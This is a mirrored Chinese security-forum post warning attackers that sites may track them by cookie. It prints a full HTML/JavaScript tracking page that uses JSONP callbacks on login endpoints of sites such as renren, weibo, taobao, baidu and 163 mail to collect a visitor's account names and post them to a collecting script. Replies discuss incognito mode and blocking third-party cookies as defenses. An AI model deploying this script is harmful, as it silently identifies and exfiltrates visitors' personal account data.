WooYun Zone镜像——注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪

admin 7月前 137

追踪代码

<html>

<head>

<title>test</title>

</head>

<body>

<strong>It works</strong>

<script type="text/javascript">

var pid = 20130906003345;

var random = 60113;

function GetObjString(obj) {

if (typeof(obj) != 'object') {

return obj;

}

var retstr = '{ ';

for (fld in obj) {

retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n";

}

retstr += ' }';

return retstr;

}

function ProcessDataInner(obj, subject) {

var objstr = GetObjString(obj);

objstr = escape(objstr);

SendDataToServer(objstr, subject);

}

function createXHR() {

// Checks whether support XMLHttpRequest or not.

if (typeof XMLHttpRequest != "undefined") {

return new XMLHttpRequest();

}

// IE6 and elder version.

else if (typeof ActiveXObject != "undefined") {

if (typeof arguments.callee.activeXString != "string") {

var versions = ["MSXML2.XMLHttp6.0", "MSXML2.XMLHttp3.0", "MSXML2.XMLHttp"];

for (var i = 0; i < versions.length; i++) {

try {

var xhr = new ActiveXObject(versions[i]);

arguments.callee.activeXString = versions[i];

return xhr;

} catch(ex) {

throw new Error(ex.toString());

}

}

return new ActiveXObject(arguments.callee.activeXString);

} else {

throw new Error("No XHR object available");

}

}

return null;

}

function SendDataToServer(Data, subject) {

var req = createXHR();

if (req != null) {

req.onreadystatechange = function() {

if (req.readyState == 4) {}

};

req.open("POST", "SaveInfo.php", true);

req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

req.send('data=' + Data + '&pid=' + pid + '&random=' + random + '&subject=' + subject, false);

}

}

function GetDataFromServer(Url, Method, Data) {

// Creates a XMLHttpRequest object.

if (Method == null || Method == '') {

Method = 'GET';

}

if (Url == null || Url == '') {

return '';

}

var req = new createXHR();

if (req != null) {

req.open(Method, Url, false);

if (Method == 'POST' || Data != null) {

req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

}

req.send(Data);

return req.responseText;

}

return '';

}

function renren(obj) {

ProcessDataInner(obj, 1);

}

function jingdong(obj) {

ProcessDataInner(obj, 2);

}

function tianya(bl, obj) {

ProcessDataInner(obj, 3);

}

function weibo(obj) {

ProcessDataInner(obj, 4);

}

function vancl(obj) {

ProcessDataInner(obj, 6);

}

function netease_mail(obj) {

ProcessDataInner(obj, 7);

}

function mop(obj) {

ProcessDataInner(obj, 9);

}

function taobao_nick(obj) {

ProcessDataInner(obj, 13);

}

function baidu(obj) {

ProcessDataInner(obj, 14);

}

function renren_all(obj) {

ProcessDataInner(obj, 15);

}

function jingdong_history(obj) {

ProcessDataInner(obj, 16);

}

function baidu_all(obj) {

ProcessDataInner(obj, 17);

}

</script>

<script src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=renren"></script>

<script src="http://passport.360top.com/call/checkHello?callback=jingdong"></script>

<script src="http://passport.tianya.cn/online/checkuseronline.jsp?callback=tianya"></script>

<script src="http://weibo.com/ajaxlogin.php?fmelogin=1&callback=weibo"></script>

<script src="http://my.vancl.com/user/getusernamebycookie?vancl"></script>

<script>ProcessDataInner(getUserName,6);</script>

<script src="http://mailfriends.mail.163.com/mailfriends/webApi.do?json={"event":"logon"}&callback=netease_mail"></script>

<script src="http://passport.mop.com/common/user-info?callback=mop"></script>

<script src="http://tmm.taobao.com/member/birth_show.do?from=www.tmall.com&callback=taobao_nick"></script>

<script src="http://fm.baidu.com/dev/api/?tn=playlist&format=jsonp&id=1&callback=baidu"></script>

<script src="http://passport.game.renren.com/user/info?callback=renren_all"></script>

<script src="http://my.360buy.com/book/track.action?jsoncallback=jingdong_history"></script>

<script src="http://zhidao.baidu.com/api/loginInfo?callback=baidu_all"></script>

</body>

</html>

你懂的

@核攻击

[原文地址]

相关讨论:

1#

Ivan | 2013-09-08 12:36

搞個快照神馬的……

2#

Hackx7 | 2013-09-08 12:36

好牛逼的样子

3#

无敌L.t.H (:?门安天京北爱我) | 2013-09-08 12:47

拒绝第三方

4#

luom | 2013-09-08 12:49

这尼玛大陷阱啊

5#

Sogili (.) 长短短 () | 2013-09-08 13:29

ctrl+shift+n 打开隐身窗口

6#

liner (/\) | 2013-09-08 13:36

7#

猪猪侠 (A) | 2013-09-08 13:43

很好。

8#

xsser (十根阳具有长短!!) | 2013-09-08 14:24

撸主,百度甚至可以取得关键广告,知道你喜好的哈

9#

safe121 (--黑阔娱乐群:328034840) | 2013-09-08 14:30

@xsser 我在想,chrome的Block third-party cookies and site data是否有效。

感觉这个方法是 Cookie Stuffing

10#

一只猿 (恭喜你又中奖了!!) | 2013-09-08 14:38

@xsser 如何拒绝百度获取,有没有好的方法

11#

x7iao (宇宙黑阔。) | 2013-09-08 16:12

撸主 有接收端吗

12#

想要减肥的胖纸 | 2013-09-08 16:29

我又不做违法的事情。为什么会怕追踪呢。

13#

低调 | 2013-09-08 17:07

@xsser 一般网站联盟连男的女的 多大岁数 文化程度 都能分析出来 呵呵

核攻击 | 2013-09-12 10:49

WTF


最新回复 (0)
返回
发新帖